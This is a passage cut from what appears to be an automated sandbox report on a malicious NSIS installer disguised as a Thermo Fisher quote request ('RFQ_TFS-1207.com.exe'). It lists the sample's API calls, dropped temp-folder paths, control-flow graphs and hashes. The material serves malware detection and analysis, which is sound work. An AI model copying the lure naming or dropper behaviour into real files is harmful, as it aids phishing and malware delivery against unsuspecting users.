                                              • DeleteFileW.KERNELBASE(1033,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403878
                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",00000000,?,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403951
                                                • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,?,0000000A,?), ref: 00406561
                                              • wsprintfW.USER32 ref: 004039AE
                                              • GetFileAttributesW.KERNEL32(1012,C:\Users\user\AppData\Local\Temp\), ref: 004039E1
                                              • DeleteFileW.KERNEL32(1012), ref: 004039ED
                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1B
                                                • Part of subcall function 00406314: MoveFileExW.KERNEL32(?,?,00000005,00405E12,?,00000000,000000F1,?,?,?,?,?), ref: 0040631E
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,1012,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A31
                                                • Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,1012,?), ref: 00405B60
                                                • Part of subcall function 00405B37: CloseHandle.KERNEL32(?,?,?,1012,?), ref: 00405B6D
                                                • Part of subcall function 004068B1: FindFirstFileW.KERNELBASE(75F03420,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                                • Part of subcall function 004068B1: FindClose.KERNEL32(00000000), ref: 004068C8
                                              • OleUninitialize.OLE32(?,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403A7F
                                              • ExitProcess.KERNEL32 ref: 00403A9C
                                              • CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,1012,00000000), ref: 00403AA3
                                              • GetCurrentProcess.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00403ABF
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC6
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADB
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AFE
                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B23
                                              • ExitProcess.KERNEL32 ref: 00403B46
                                                • Part of subcall function 00405B02: CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00405B08
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                              • String ID: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"$1012$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards$C:\Users\user\Desktop$C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                              • API String ID: 1813718867-4245427026
                                              • Opcode ID: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                              • Instruction ID: 93f5a648143c5b163d48a65c291177ce643c8a453b959a17227cb1525d46e2db
                                              • Opcode Fuzzy Hash: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                              • Instruction Fuzzy Hash: 2CF10370604301AAD720AF659D05B2B7EE8EF85706F00483EF581B62D2DB7DDA45CB6E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 151 405718-405733 152 4058c2-4058c9 151->152 153 405739-405800 GetDlgItem * 3 call 404508 call 404e61 GetClientRect GetSystemMetrics SendMessageW * 2 151->153 154 4058f3-405900 152->154 155 4058cb-4058ed GetDlgItem CreateThread CloseHandle 152->155 171 405802-40581c SendMessageW * 2 153->171 172 40581e-405821 153->172 158 405902-405908 154->158 159 40591e-405928 154->159 155->154 161 405943-40594c call 40453a 158->161 162 40590a-405919 ShowWindow * 2 call 404508 158->162 163 40592a-405930 159->163 164 40597e-405982 159->164 175 405951-405955 161->175 162->159 168 405932-40593e call 4044ac 163->168 169 405958-405968 ShowWindow 163->169 164->161 166 405984-40598a 164->166 166->161 173 40598c-40599f SendMessageW 166->173 168->161 176 405978-405979 call 4044ac 169->176 177 40596a-405973 call 4055d9 169->177 171->172 179 405831-405848 call 4044d3 172->179 180 405823-40582f SendMessageW 172->180 181 405aa1-405aa3 173->181 182 4059a5-4059d0 CreatePopupMenu call 406591 AppendMenuW 173->182 176->164 177->176 190 40584a-40585e ShowWindow 179->190 191 40587e-40589f GetDlgItem SendMessageW 179->191 180->179 181->175 188 4059d2-4059e2 GetWindowRect 182->188 189 4059e5-4059fa TrackPopupMenu 182->189 188->189 189->181 192 405a00-405a17 189->192 193 405860-40586b ShowWindow 190->193 194 40586d 190->194 191->181 195 4058a5-4058bd SendMessageW * 2 191->195 196 405a1c-405a37 SendMessageW 192->196 197 405873-405879 call 404508 193->197 194->197 195->181 196->196 198 405a39-405a5c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a5e-405a85 SendMessageW 198->200 200->200 201 405a87-405a9b GlobalUnlock SetClipboardData CloseClipboard 200->201 201->181
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 00405776
                                              • GetDlgItem.USER32(?,000003EE), ref: 00405785
                                              • GetClientRect.USER32(?,?), ref: 004057C2
                                              • GetSystemMetrics.USER32(00000002), ref: 004057C9
                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057EA
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FB
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040580E
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581C
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040582F
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405851
                                              • ShowWindow.USER32(?,?), ref: 00405865
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405886
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405896
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058AF
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BB
                                              • GetDlgItem.USER32(?,000003F8), ref: 00405794
                                                • Part of subcall function 00404508: SendMessageW.USER32(?,?,00000001,00404333), ref: 00404516
                                              • GetDlgItem.USER32(?,000003EC), ref: 004058D8
                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000056AC,00000000), ref: 004058E6
                                              • CloseHandle.KERNELBASE(00000000), ref: 004058ED
                                              • ShowWindow.USER32(00000000), ref: 00405911
                                              • ShowWindow.USER32(?,?), ref: 00405916
                                              • ShowWindow.USER32(?), ref: 00405960
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405994
                                              • CreatePopupMenu.USER32 ref: 004059A5
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059B9
                                              • GetWindowRect.USER32(?,?), ref: 004059D9
                                              • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004059F2
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2A
                                              • OpenClipboard.USER32(00000000), ref: 00405A3A
                                              • EmptyClipboard.USER32 ref: 00405A40
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4C
                                              • GlobalLock.KERNEL32(00000000), ref: 00405A56
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6A
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405A8A
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A95
                                              • CloseClipboard.USER32 ref: 00405A9B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {
                                              • API String ID: 590372296-366298937
                                              • Opcode ID: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
                                              • Instruction ID: d944e331103d7d797bb7559e04b2c0af071990b1bd98ce6caf222631f3d5da7c
                                              • Opcode Fuzzy Hash: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
                                              • Instruction Fuzzy Hash: 47B13971900608FFDB11AF60DD85EAE7B79FB48354F10813AFA41B61A0CB788A51DF68
                                              APIs
                                                • Part of subcall function 6FE712BB: GlobalAlloc.KERNELBASE(?,?,6FE712DB,?,6FE7137F,00000019,6FE711CA,-000000A0), ref: 6FE712C5
                                              • GlobalAlloc.KERNELBASE(?,00001CA4), ref: 6FE71D2D
                                              • lstrcpyW.KERNEL32(00000008,?), ref: 6FE71D75
                                              • lstrcpyW.KERNEL32(00000808,?), ref: 6FE71D7F
                                              • GlobalFree.KERNEL32(00000000), ref: 6FE71D92
                                              • GlobalFree.KERNEL32(?), ref: 6FE71E74
                                              • GlobalFree.KERNEL32(?), ref: 6FE71E79
                                              • GlobalFree.KERNEL32(?), ref: 6FE71E7E
                                              • GlobalFree.KERNEL32(00000000), ref: 6FE72068
                                              • lstrcpyW.KERNEL32(?,?), ref: 6FE72222
                                              • GetModuleHandleW.KERNEL32(00000008), ref: 6FE722A1
                                              • LoadLibraryW.KERNEL32(00000008), ref: 6FE722B2
                                              • GetProcAddress.KERNEL32(?,?), ref: 6FE7230C
                                              • lstrlenW.KERNEL32(00000808), ref: 6FE72326
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true
                                              • Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                              • String ID:
                                              • API String ID: 245916457-0
                                              • Opcode ID: 1269ecf447a17c84c949701b5d075142466cbccc3cde0d98be5475642a63ec88
                                              • Instruction ID: 612b436ee87c1d6b1cacb0ebf0b3ad5f85847a2549e5bbdafeb9494aeec7a526
                                              • Opcode Fuzzy Hash: 1269ecf447a17c84c949701b5d075142466cbccc3cde0d98be5475642a63ec88
                                              • Instruction Fuzzy Hash: 27227A71D08746DADB248FF889906EDBFB0FF05319F30462ED165A6280DB78A682CF51

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 671 405c60-405c86 call 405f2b 674 405c88-405c9a DeleteFileW 671->674 675 405c9f-405ca6 671->675 676 405e1c-405e20 674->676 677 405ca8-405caa 675->677 678 405cb9-405cc9 call 406554 675->678 679 405cb0-405cb3 677->679 680 405dca-405dcf 677->680 684 405cd8-405cd9 call 405e6f 678->684 685 405ccb-405cd6 lstrcatW 678->685 679->678 679->680 680->676 683 405dd1-405dd4 680->683 686 405dd6-405ddc 683->686 687 405dde-405de6 call 4068b1 683->687 688 405cde-405ce2 684->688 685->688 686->676 687->676 695 405de8-405dfc call 405e23 call 405c18 687->695 691 405ce4-405cec 688->691 692 405cee-405cf4 lstrcatW 688->692 691->692 694 405cf9-405d15 lstrlenW FindFirstFileW 691->694 692->694 697 405d1b-405d23 694->697 698 405dbf-405dc3 694->698 711 405e14-405e17 call 4055d9 695->711 712 405dfe-405e01 695->712 701 405d43-405d57 call 406554 697->701 702 405d25-405d2d 697->702 698->680 700 405dc5 698->700 700->680 713 405d59-405d61 701->713 714 405d6e-405d79 call 405c18 701->714 703 405da2-405db2 FindNextFileW 702->703 704 405d2f-405d37 702->704 703->697 710 405db8-405db9 FindClose 703->710 704->701 707 405d39-405d41 704->707 707->701 707->703 710->698 711->676 712->686 715 405e03-405e12 call 4055d9 call 406314 712->715 713->703 716 405d63-405d6c call 405c60 713->716 724 405d9a-405d9d call 4055d9 714->724 725 405d7b-405d7e 714->725 715->676 716->703 724->703 728 405d80-405d90 call 4055d9 call 406314 725->728 729 405d92-405d98 725->729 728->703 729->703
                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405C89
                                              • lstrcatW.KERNEL32(007A3750,\*.*,007A3750,?,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405CD1
                                              • lstrcatW.KERNEL32(?,0040A014,?,007A3750,?,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405CF4
                                              • lstrlenW.KERNEL32(?,?,0040A014,?,007A3750,?,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405CFA
                                              • FindFirstFileW.KERNEL32(007A3750,?,?,?,0040A014,?,007A3750,?,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405D0A
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAA
                                              • FindClose.KERNEL32(00000000), ref: 00405DB9
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C6D
                                              • \*.*, xrefs: 00405CCB
                                              • "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe", xrefs: 00405C69
                                              • P7z, xrefs: 00405CB9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"$C:\Users\user\AppData\Local\Temp\$P7z$\*.*
                                              • API String ID: 2035342205-2058490772
                                              • Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                              • Instruction ID: f748e5475402f1fc91d3f7fbe8cbfa38c73e6686c0f945f98d649a4eb698cdfa
                                              • Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                              • Instruction Fuzzy Hash: EB41B231800A14B6DB216B26CC49BAF7678EF81714F20813BF441B11D1DB7C4A829EAE
                                              APIs
                                              • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,?), ref: 0040224E
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards, xrefs: 0040228E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards
                                              • API String ID: 542301482-1958581672
                                              • Opcode ID: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
                                              • Instruction ID: d027746e191c14b49f1eee61a42344c893d98f4f720128a79e15815c221bbdc7
                                              • Opcode Fuzzy Hash: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
                                              • Instruction Fuzzy Hash: 3B411675A00209AFCB00DFE4C989AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                              APIs
                                              • FindFirstFileW.KERNELBASE(75F03420,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                              • FindClose.KERNEL32(00000000), ref: 004068C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                              • Instruction ID: c1f58c6a55c378a7321320ff0386b713db4abc0e26cca29c2297fdfd4174c4a1
                                              • Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                              • Instruction Fuzzy Hash: CFD0123251A1305BC28027386D0C84B7B98AF56331712CB36F16AF21E0C7748C6287A8
                                              APIs
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                              • Instruction ID: bedb772ef0a2f17f15cc30cd16f16fd49c67dd7be69949238e740b54367540b4
                                              • Opcode Fuzzy Hash: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                              • Instruction Fuzzy Hash: 08F0E231A04100EAD700EBA4DA499AEB374FF04314F20417BE101F30E0D7B84D409B2D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 202 403fd4-403fe6 203 403fec-403ff2 202->203 204 40414d-40415c 202->204 203->204 207 403ff8-404001 203->207 205 4041ab-4041c0 204->205 206 40415e-4041a6 GetDlgItem * 2 call 4044d3 SetClassLongW call 40140b 204->206 209 404200-404205 call 40451f 205->209 210 4041c2-4041c5 205->210 206->205 211 404003-404010 SetWindowPos 207->211 212 404016-40401d 207->212 226 40420a-404225 209->226 216 4041c7-4041d2 call 401389 210->216 217 4041f8-4041fa 210->217 211->212 213 404061-404067 212->213 214 40401f-404039 ShowWindow 212->214 221 404080-404083 213->221 222 404069-40407b DestroyWindow 213->222 219 40413a-404148 call 40453a 214->219 220 40403f-404052 GetWindowLongW 214->220 216->217 242 4041d4-4041f3 SendMessageW 216->242 217->209 225 4044a0 217->225 232 4044a2-4044a9 219->232 220->219 229 404058-40405b ShowWindow 220->229 233 404085-404091 SetWindowLongW 221->233 234 404096-40409c 221->234 230 40447d-404483 222->230 225->232 227 404227-404229 call 40140b 226->227 228 40422e-404234 226->228 227->228 239 40423a-404245 228->239 240 40445e-404477 DestroyWindow EndDialog 228->240 229->213 230->225 238 404485-40448b 230->238 233->232 234->219 241 4040a2-4040b1 GetDlgItem 234->241 238->225 244 40448d-404496 ShowWindow 238->244 239->240 245 40424b-404298 call 406591 call 4044d3 * 3 GetDlgItem 239->245 240->230 246 4040d0-4040d3 241->246 247 4040b3-4040ca SendMessageW IsWindowEnabled 241->247 242->232 244->225 274 4042a2-4042de ShowWindow KiUserCallbackDispatcher call 4044f5 EnableWindow 245->274 275 40429a-40429f 245->275 249 4040d5-4040d6 246->249 250 4040d8-4040db 246->250 247->225 247->246 252 404106-40410b call 4044ac 249->252 253 4040e9-4040ee 250->253 254 4040dd-4040e3 250->254 252->219 255 4040f0-4040f6 253->255 256 404124-404134 SendMessageW 253->256 254->256 259 4040e5-4040e7 254->259 260 4040f8-4040fe call 40140b 255->260 261 40410d-404116 call 40140b 255->261 256->219 259->252 270 404104 260->270 261->219 271 